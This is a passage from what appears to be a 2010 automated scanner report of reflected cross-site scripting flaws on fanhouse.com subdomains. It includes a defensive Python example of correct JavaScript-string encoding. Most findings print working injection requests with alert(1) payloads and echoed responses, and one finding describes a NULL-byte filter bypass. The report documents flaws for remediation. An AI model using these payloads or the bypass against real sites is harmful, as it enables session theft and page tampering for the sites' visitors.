GET /?a4e07"-alert(1)-"caebf6daf08=1 HTTP/1.1
Host: fantasybaseball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
2.13. http://fantasybasketball.fanhouse.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://fantasybasketball.fanhouse.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 200fc"><script>alert(1)</script>66fd91e99f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?200fc"><script>alert(1)</script>66fd91e99f1=1 HTTP/1.1
Host: fantasybasketball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <link rel="canonical" href="http://fantasybasketball.fanhouse.com/?200fc"><script>alert(1)</script>66fd91e99f1=1"/> ...[SNIP]...
2.14. http://fantasybasketball.fanhouse.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://fantasybasketball.fanhouse.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc8f8"-alert(1)-"045ee1fee21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?dc8f8"-alert(1)-"045ee1fee21=1 HTTP/1.1
Host: fantasybasketball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
2.15. http://fantasyfootball.fanhouse.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://fantasyfootball.fanhouse.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86285"-alert(1)-"a843d937da8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?86285"-alert(1)-"a843d937da8=1 HTTP/1.1
Host: fantasyfootball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
2.16. http://golf.fanhouse.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://golf.fanhouse.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e6f7"-alert(1)-"76c2672023b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?4e6f7"-alert(1)-"76c2672023b=1 HTTP/1.1
Host: golf.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
2.17. http://golf.fanhouse.com/leaderboard/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://golf.fanhouse.com
Path: /leaderboard/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da5d6"><script>alert(1)</script>9c3c14a29ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /leaderboard/?da5d6"><script>alert(1)</script>9c3c14a29ce=1 HTTP/1.1
Host: golf.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Response
HTTP/1.0 404 /leaderboard/
Date: Thu, 16 Dec 2010 18:16:20 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Set-Cookie: JSESSIONID=28F7CBFCAE5817613F934A5C4945D0B1; Path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta h ...[SNIP]... <link rel="canonical" href="http://golf.fanhouse.com/leaderboard?da5d6"><script>alert(1)</script>9c3c14a29ce=1"/> ...[SNIP]...
2.18. http://mlb.fanhouse.com/2010/12/15/bob-feller-hall-of-fame-pitcher-dies-at-92/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a733f"-alert(1)-"343c8ebcf3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/bob-feller-hall-of-fame-pitcher-dies-at-92/?a733f"-alert(1)-"343c8ebcf3c=1 HTTP/1.1
Host: mlb.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3076c"><script>alert(1)</script>24631300338 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/bob-feller-hall-of-fame-pitcher-dies-at-92/?3076c"><script>alert(1)</script>24631300338=1 HTTP/1.1
Host: mlb.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fad45"><script>alert(1)</script>38330725520 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/bob-fellers-delivery-fierce-to-the-finish/?fad45"><script>alert(1)</script>38330725520=1 HTTP/1.1
Host: mlb.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f736a"-alert(1)-"bb8742feec7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/bob-fellers-delivery-fierce-to-the-finish/?f736a"-alert(1)-"bb8742feec7=1 HTTP/1.1
Host: mlb.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Response
var s_code=s_265.t();if(s_code)document.write(s_code) ...[SNIP]...
2.22. http://nba.fanhouse.com/2010/12/15/boston-celtics-vs-new-york-knicks-rivalry-shootout-msg/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9132a"-alert(1)-"710ccf93e31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/boston-celtics-vs-new-york-knicks-rivalry-shootout-msg/?9132a"-alert(1)-"710ccf93e31=1 HTTP/1.1
Host: nba.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Response
var s_code=s_265.t();if(s_code)document ...[SNIP]...
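The `"-alert(1)-"` payloads in this report all exploit the same thing: the request URL is written into a double-quoted JavaScript string literal, so a `"` in the input terminates the literal and the surrounding `-` operators turn `"..."-alert(1)-"..."` into a valid expression. The report's responses are truncated at the Omniture s_code snippet, so the actual statement is not shown. The following Python example is added here and is not code from the report or the application; the `s_pageURL` variable name, the `page_script_*` builders and the `string_literal_intact` tokenizer are assumptions for illustration. It contrasts unescaped interpolation with a JavaScript-string encoder that also neutralises `</script>` inside an inline script block.

```python
import json

# Assumed name of the variable the page assigns; the report does not show it.
_TEMPLATE = 'var s_pageURL = "%s";'


def page_script_vulnerable(request_url: str) -> str:
    """Model of the reflection: the request URL is dropped into a double-quoted
    JavaScript string literal with no escaping."""
    return _TEMPLATE % request_url


def js_string_literal(value: str) -> str:
    """Encode a Python string as a JavaScript string literal that is safe inside an
    inline <script> block. json.dumps escapes the quote, the backslash, control
    characters and (with ensure_ascii) every non-ASCII character, including the
    U+2028/U+2029 line terminators. On top of that '<', '>' and '&' are written
    as \\u escapes, so the literal can never contain '</script>' and the HTML
    parser never sees a tag boundary inside the script."""
    literal = json.dumps(value, ensure_ascii=True)
    return literal.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def page_script_hardened(request_url: str) -> str:
    """Same assignment, value passed through js_string_literal()."""
    return "var s_pageURL = %s;" % js_string_literal(request_url)


def string_literal_intact(statement: str) -> bool:
    """Check whether the first double-quoted literal in the statement runs all the
    way to the trailing ';'. Walks the literal honouring backslash escapes, which is
    how the JavaScript tokenizer decides where the string ends. False means the
    payload closed the string early, which is what the "-alert(1)-" payloads do."""
    start = statement.index('"')
    i = start + 1
    while i < len(statement):
        ch = statement[i]
        if ch == "\\":
            i += 2          # escaped character, cannot terminate the literal
            continue
        if ch == '"':
            return statement[i + 1:] == ";"
        i += 1
    return False            # unterminated literal


if __name__ == "__main__":
    # Constructed URL carrying the report's payload shape.
    url = 'http://nba.fanhouse.com/2010/12/15/boston-celtics-vs-new-york-knicks-rivalry-shootout-msg/?9132a"-alert(1)-"710ccf93e31=1'
    print(page_script_vulnerable(url))
    print(page_script_hardened(url))
```

Note that HTML-encoding the value would be the wrong fix here: `&quot;` inside a script block is four literal characters to the JavaScript engine, and a `</script>` in the input would still end the block. The encoding has to match the context the data lands in.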
2.23. http://nba.fanhouse.com/2010/12/15/boston-celtics-vs-new-york-knicks-rivalry-shootout-msg/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 895aa"><script>alert(1)</script>2eb9bc331ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/boston-celtics-vs-new-york-knicks-rivalry-shootout-msg/?895aa"><script>alert(1)</script>2eb9bc331ff=1 HTTP/1.1
Host: nba.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://nba.fanhouse.com/2010/12/15/boston-celtics-vs-new-york-knicks-rivalry-shootout-msg/?895aa"><script>alert(1)</script>2eb9bc331ff=1"/> ...[SNIP]...
2.24. http://nba.fanhouse.com/2010/12/15/mesmerizing-photo-of-james-and-wade-was-one-incredible-feat/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98e4f"-alert(1)-"9476da736df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/mesmerizing-photo-of-james-and-wade-was-one-incredible-feat/?98e4f"-alert(1)-"9476da736df=1 HTTP/1.1
Host: nba.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
2.25. http://nba.fanhouse.com/2010/12/15/mesmerizing-photo-of-james-and-wade-was-one-incredible-feat/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59f53"><script>alert(1)</script>8db59357966 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/mesmerizing-photo-of-james-and-wade-was-one-incredible-feat/?59f53"><script>alert(1)</script>8db59357966=1 HTTP/1.1
Host: nba.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://nba.fanhouse.com/2010/12/15/mesmerizing-photo-of-james-and-wade-was-one-incredible-feat/?59f53"><script>alert(1)</script>8db59357966=1"/> ...[SNIP]...
2.26. http://nba.fanhouse.com/2010/12/15/nets-lakers-rockets-trade-scorecard/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://nba.fanhouse.com
Path: /2010/12/15/nets-lakers-rockets-trade-scorecard/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 512bb"><script>alert(1)</script>40d758904e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/nets-lakers-rockets-trade-scorecard/?512bb"><script>alert(1)</script>40d758904e7=1 HTTP/1.1
Host: nba.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://nba.fanhouse.com/2010/12/15/nets-lakers-rockets-trade-scorecard/?512bb"><script>alert(1)</script>40d758904e7=1"/> ...[SNIP]...
2.27. http://nba.fanhouse.com/2010/12/15/nets-lakers-rockets-trade-scorecard/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://nba.fanhouse.com
Path: /2010/12/15/nets-lakers-rockets-trade-scorecard/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fa15"-alert(1)-"3fd2331c1bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/nets-lakers-rockets-trade-scorecard/?4fa15"-alert(1)-"3fd2331c1bb=1 HTTP/1.1
Host: nba.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0485"style%3d"x%3aexpression(alert(1))"5066b35b895 was submitted in the REST URL parameter 3. This input was echoed as d0485"style="x:expression(alert(1))"5066b35b895 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to older versions of Internet Explorer (it is not evaluated in IE8 standards mode or by other browsers), so this particular payload may not fire elsewhere; the underlying defect, an unencoded double quote in an attribute value, is browser-independent.
Request
GET /2010/12/15d0485"style%3d"x%3aexpression(alert(1))"5066b35b895/michael-haywood-reportedly-to-be-named-new-pitt-football-coach/ HTTP/1.1
Host: ncaafootball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: s_pers=%20s_getnr%3D1292520945616-New%7C1355592945616%3B%20s_nrgvo%3DNew%7C1355592945618%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="referer" value="http://ncaafootball.fanhouse.com:1080/2010/12/15d0485"style="x:expression(alert(1))"5066b35b895/michael-haywood-reportedly-to-be-named-new-pitt-football-coach/"> ...[SNIP]...
2.29. http://ncaafootball.fanhouse.com/2010/12/15/michael-haywood-reportedly-to-be-named-new-pitt-football-coach/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5b14"-alert(1)-"ef2f3406a15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/michael-haywood-reportedly-to-be-named-new-pitt-football-coach/?d5b14"-alert(1)-"ef2f3406a15=1 HTTP/1.1
Host: ncaafootball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: s_pers=%20s_getnr%3D1292520945616-New%7C1355592945616%3B%20s_nrgvo%3DNew%7C1355592945618%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
2.30. http://ncaafootball.fanhouse.com/2010/12/15/michael-haywood-reportedly-to-be-named-new-pitt-football-coach/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5b47"><script>alert(1)</script>aaa0c01f7e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/michael-haywood-reportedly-to-be-named-new-pitt-football-coach/?e5b47"><script>alert(1)</script>aaa0c01f7e5=1 HTTP/1.1
Host: ncaafootball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: s_pers=%20s_getnr%3D1292520945616-New%7C1355592945616%3B%20s_nrgvo%3DNew%7C1355592945618%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://ncaafootball.fanhouse.com/2010/12/15/michael-haywood-reportedly-to-be-named-new-pitt-football-coach/?e5b47"><script>alert(1)</script>aaa0c01f7e5=1"/> ...[SNIP]...
2.31. http://ncaafootball.fanhouse.com/2010/12/15/villanova-rowan-football-players-get-in-the-game-save-lives/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53b25"-alert(1)-"9e8161e7035 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/villanova-rowan-football-players-get-in-the-game-save-lives/?53b25"-alert(1)-"9e8161e7035=1 HTTP/1.1
Host: ncaafootball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: s_pers=%20s_getnr%3D1292520945616-New%7C1355592945616%3B%20s_nrgvo%3DNew%7C1355592945618%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
2.32. http://ncaafootball.fanhouse.com/2010/12/15/villanova-rowan-football-players-get-in-the-game-save-lives/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdd0e"><script>alert(1)</script>34f7b6092c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/villanova-rowan-football-players-get-in-the-game-save-lives/?cdd0e"><script>alert(1)</script>34f7b6092c7=1 HTTP/1.1
Host: ncaafootball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: s_pers=%20s_getnr%3D1292520945616-New%7C1355592945616%3B%20s_nrgvo%3DNew%7C1355592945618%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://ncaafootball.fanhouse.com/2010/12/15/villanova-rowan-football-players-get-in-the-game-save-lives/?cdd0e"><script>alert(1)</script>34f7b6092c7=1"/> ...[SNIP]...
2.33. http://nfl.fanhouse.com/2010/12/15/nfl-picks-week-15-nfc-east-up-for-grabs-as-eagles-giants-clash/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaa60"><script>alert(1)</script>a320c1aa488 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/nfl-picks-week-15-nfc-east-up-for-grabs-as-eagles-giants-clash/?aaa60"><script>alert(1)</script>a320c1aa488=1 HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://nfl.fanhouse.com/2010/12/15/nfl-picks-week-15-nfc-east-up-for-grabs-as-eagles-giants-clash/?aaa60"><script>alert(1)</script>a320c1aa488=1"/> ...[SNIP]...
2.34. http://nfl.fanhouse.com/2010/12/15/nfl-picks-week-15-nfc-east-up-for-grabs-as-eagles-giants-clash/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aad1c"-alert(1)-"79989e1836e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/nfl-picks-week-15-nfc-east-up-for-grabs-as-eagles-giants-clash/?aad1c"-alert(1)-"79989e1836e=1 HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6edf0"-alert(1)-"36b548b3c4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /6edf0"-alert(1)-"36b548b3c4c/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/ HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007f9b5"><script>alert(1)</script>329e06b4101 was submitted in the REST URL parameter 1. This input was echoed as 7f9b5"><script>alert(1)</script>329e06b4101 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /%007f9b5"><script>alert(1)</script>329e06b4101/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/ HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:15:47 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999927
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25555
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <link rel="canonical" href="http://nfl.fanhouse.com/%007f9b5"><script>alert(1)</script>329e06b4101/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/"/> ...[SNIP]...
